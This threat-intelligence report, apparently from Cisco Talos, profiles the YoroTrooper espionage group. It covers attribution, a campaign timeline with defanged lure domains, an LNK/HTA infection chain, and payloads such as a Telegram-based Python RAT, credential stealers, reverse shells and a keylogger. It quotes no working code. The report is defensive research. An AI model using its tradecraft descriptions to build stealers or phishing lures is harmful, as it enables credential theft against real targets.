**YoroTrooper affiliation assessment**

While attribution can be difficult, we assess that there are no relevant overlaps between YoroTrooper and Kasablanka, the group behind the development of LodaRat4Android. Our analysis on Kasablanka in 2021 was that the operators might be different from the developers, which we can now confirm.  

The overlaps with the PoetRAT team are stronger, especially on non-technical aspects of the campaigns but there are not enough for us to link them even with a low confidence level. Cisco Talos discovered the PoetRAT team in 2020 during a series of campaigns that successfully compromised Azerbaijan embassies and other government agencies.

While there are no concrete links between operators of PoetRAT and YoroTrooper, such as infrastructure overlaps, there are some similarities in their TTPs and victimology. Both actors use open-source tools to perform credential exfiltration and initial reconnaissance. In terms of bespoke tools, both threat actors have an affinity towards using Python-based implants, usually distributed, implemented or packed in a rather unusual way that is characteristic of the respective threat actors. The PoetRAT team would append the Python interpreter to a malicious document that would be extracted and used to execute the Python-based PoetRAT. YoroTropper used the Nuitka framework to pack their custom credential stealer in such a weird way that it ended up leaking the Python code rather than obfuscating it.  

Regarding victimology, there are some noteworthy overlaps between YoroTrooper and the PoetRAT team, who mainly target Azerbaijan, specifically their embassies, energy sector and government institutions. YoroTropper is also targeting Azerbaijan and other CIS countries, and their embassies, with a similar focus on the energy sector.

**Kasablanka is not the sole operator of LodaRAT**

While attributing this campaign to a specific threat actor, what stuck out the most was the use of LodaRAT and its repeated attribution to a singular threat actor called “Kasablanka” in open-source reporting. While Talos assesses that LodaRAT is built and sometimes operated by Kasablanka, there is evidence that indicates that LodaRAT is being used in multiple distinct campaigns. Therefore, despite the fact that LodaRAT isn’t publicly available, either open-sourced or for sale publicly — although one can be decompiled easily for use by any actor — our assessment is that there are multiple operators in the threat landscape employing LodaRAT. Therefore, YoroTrooper’s use of LodaRAT should _**not**_ be used as the sole indicator for attribution.  

Our research shows that the LodaRAT samples used by YoroTrooper deviate from previous versions of the malware employed by Kasablanka. In fact, the LodaRAT variants used by Yoro Trooper are based on versions we’ve seen being deployed in other crimeware campaigns alongside RedLine and VenomRAT, indicating LodaRAT’s availability to multiple threat actors.

This strengthens our assertion that although Kasablanka is the developer of LodaRAT and Loda4Android, it is not the sole operator of LodaRAT, an assessment we made as early as 2021.

**Campaign profiles**

This threat actor extensively targets CIS countries using a variety of malware deployed by a relatively simple infection chain. The operators have utilized a diverse suite of malware such as:  

*   Commodity RATs and stealers: Warzone, LodaRAT and Stink stealer.
*   Custom Python-based information stealers: Custom scripts for stealing Google Chrome browser credentials.
*   Custom Python-based RATs (with exfiltrators): First seen in June 2022, but gained popularity with the threat actor around February 2023.
*   Reverse shells: Python and Meterpreter-based reverse shells.  
    

The following is a timeline of the various geographies targeted by attacks in the campaign operated by YoroTrooper.

Time frame

Targeted Geography

Salient TTPs

February 2023

Uzbekistan

• Reuses Uzbekistani themed lures/decoys:

• Memo from energy company “UZBEKHYDROENERGO”

• Deploys a custom-built Python based reverse shell and file exfiltrator with variants built via PyInstaller and Nuitka.

• Uses HTA files.

• Also deploys Meterpreter reverse shells in certain cases.

Late January 2023

Uzbekistan

• Uses Uzbekistani themed lures/decoys:

• Memo from energy company “UZBEKHYDROENERGO”

• Deploys Python implant - custom Python based stealer.

• HTA downloads Decoy and dropper implant.

Early January 2023

Tajikistan

• Uses Tajikistani themed lures: Report from Government of Tajikistan.

• Deploys Python implant - custom Python based stealer.

• HTA downloads decoy documents and dropper implants.

December 2022

Russia

• Uses Russian themed lures.

• Uses VHDX files containing archives and LNKs that download and activate LodaRAT.

November 2022

Azerbaijan

• Uses Azerbaijani lures and malicious domains:

• mail\[.\]mfa\[.\]az\-link\[.\]email, true\[.\]az\-link\[.\]email

• Deploys Python implant - Stink stealer.

October 2022

Belarus

• IPs and domains masquerade as Belarusian domains: 

• mail\[.\]belaes\[.\]by\[.\]authentication\[.\]becloud\[.\]cc

• One variant of HTA downloads only AveMaria/Warzone RAT.

• Another variant of HTA downloads only Python based implants - Stink stealer.

• No lures.

September 2022

Russia

• VHDX based distribution introduced.

• No HTAs employed - LNKs download .NET based implants directly using curl.

• Malicious subdomains masquerading (typo-squatted) as Russian government entities:

• rnail\[.\]mintrans\[.\]gov\[.\]ru\[.\]inro\[.\]link ; rnail\[.\]iterrf\[.\]ru\[.\]inro\[.\]link ; account\[.\]nail\[.\]ru\[.\]inro\[.\]link ; rnail\[.\]rnid\[.\]ru\[.\]inro\[.\]link

August 2022

Belarus, Russia

• IPs and domains masquerade as Belarusian and Russian domains: 

• mail\[.\]hse\[.\]ru\[.\]attachment-posts\[.\]cc ; belstat\[.\]gov\[.\]by\[.\]attachment-posts\[.\]cc ; minsk\[.\]gov\[.\]by\[.\]attachment-posts\[.\]cc

• No HTAs employed - LNKs download Python based reverse shells directly using curl.

• Corrupt PDFs used as lures.

  

**Campaigns infection chain**

The latest infection chain from January 2023 is relatively straightforward but consists of multiple components such as archives, LNKs, HTAs and ultimately the final payloads:  

The infection chains begin with a malicious archive (RARs or ZIPs) delivered to targets with lure document titles referring to topics of interest to CIS nations, such as:

*   National\_Development\_Strategy.rar
*   Presidents\_Strategy\_2023.rar  
    

The campaign has also employed some generic file names as well such as “Nota.rar”, “вложение.rar”.  

We have also observed the occasional inclusion of decoy documents in the archive files, as well.  

The malicious LNK files are simple downloaders that employ mshta.exe to download and execute a remote HTA file on the infected endpoint.

LNK files downloading and executing remote HTA files.  

The malicious HTA files employed in this campaign have seen a steady evolution with the latest variant downloading the next-stage payload: a malicious EXE-based dropper and a decoy document. All these tasks are accomplished by running PowerShell-based commands.  

Malicious HTA.

**Custom-built final payloads**

YoroTrooper has been consistently introducing new malware into their infection chains in this campaign, including both custom-built and commodity malware. It is worth noting that while this campaign began with the distribution of commodity malware such as AveMaria and LodaRAT, it has evolved significantly to include Python-based malware. This highlights an increase in the efforts the threat actor is putting in, likely derived from successful breaches during the course of the campaign.

**Custom Python RAT**

The custom-built Python-based RAT is relatively simple. It uses Telegram as a medium of C2 communication and exfiltration and contains functionality to:  

*   Run arbitrary commands on the infected endpoint.
*   Upload files of interest to the attacker to a telegram channel via a bot.  
    

This bot was wrapped up into a .exe either using PyInstaller or Nuitka and then deployed in the field. There are some interesting observations here suggesting that the adversary may be speak Russian:

*   The presence of telegram messages in Russian such as: “Сохраняю в {save\_dir}” or “Файл загружен!\\nИмя”.
*   Code that decodes the output of a command run on the system into CP866 - Code page for Cyrillic.  
    

Snippet: Python based RAT used by YoroTrooper.  

**Customized stealer script**

Another Python-based payload distributed in January 2023 consists of a simple stealer script that will extract login data for the Chrome browser and exfiltrate it via a Telegram bot. This custom script has likely been stitched together from publicly available sources, such as Lazagne:  

**Commodity and miscellaneous malware**

YoroTrooper has relied heavily on the use of primarily two commodity malware families,  AveMaria/Warzone RAT and LodaRAT, especially in October and November 2022. AveMaria is a highly prolific malware family available for sale online, while LodaRAT is a RAT-based family whose authorship has been attributed to the Kasablanka threat actor.  

**Stink stealer analysis**

Yet another one of the final payloads found being deployed by YoroTrooper is an open-source credential stealer called “Stink,” which is wrapped into an executable file using the Nuitka Python compiler framework.  

Stink has several modules from Chromium-based browsers that collect credentials, cookies and bookmarks, among other information. It harvests Filezilla credentials and authentication cookies from Discord and Telegram. From the system, the stealer will collect a screenshot, external IP address, operating system, processor, graphic card and running processes:

  
All modules are executed in their own process and even each process will use its own threads to speed up the information collection process. The information is stored in a temporary directory before being compressed and exfiltrated.  

The sender module is responsible for data exfiltration via a Telegram bot. As of early March, the latest version of Stink Stealer 2.1.1 has an autostart configuration option that will create a link in the startup folder of the victim profile with the name “Windows Runner.”  

Autostart configuration options.  

**Miscellaneous malware**

Apart from commodity malware, we’ve also observed YoroTrooper deploy implants serving as reverse shells against their targets. For example, in September 2022, we saw a simple Python-based reverse shell. This one, however, was missing the Cyrillic language check (CP866).  

Another set of reverse shell implants that YoroTrooper occasionally uses are Meterpreter binaries that are then used to execute arbitrary commands on the infected endpoint. This tactic was seen being used by YoroTrooper as late as February 2023.  

A C-based custom keylogger also discovered by Talos probably deployed by one of the final stage payloads consists of the ability to record keystrokes and save them to a file on disk.  

Snippet: Keylogger functionality.

**Coverage**

Ways our customers can detect and block this threat are listed below.  

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**IOCs**

IOCs for this research can also be found at our Github repository here.

Tag

#google